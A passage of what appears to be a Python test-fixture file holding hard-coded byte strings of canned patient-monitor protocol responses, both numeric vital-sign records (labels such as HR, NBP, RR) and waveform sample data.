b"\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1" \ b"\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd" \ b"\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe7\x1f\xe7\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff" \ b"\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff" # 4th group of responses rsp_nu_4_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_4_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_4_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_4_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x01\x2e\x00\x04\x00\x07\x01\x28\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x01\x1e\x00\x03\x00\x00\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x01\x04\x00\x00\x00\x02" \ b"\x00\xfe\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40" \ b"\x06\x1f\x06\x1d\x06\x1a\x06\x15\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_4_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x08\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ b"\x08\x4c\x08\x99\x08\xe4\x09\x2f\x09\x78\x09\xbf\x0a\x03\x0a\x44" \ b"\x0a\x83" rsp_wave_4_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x10\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ 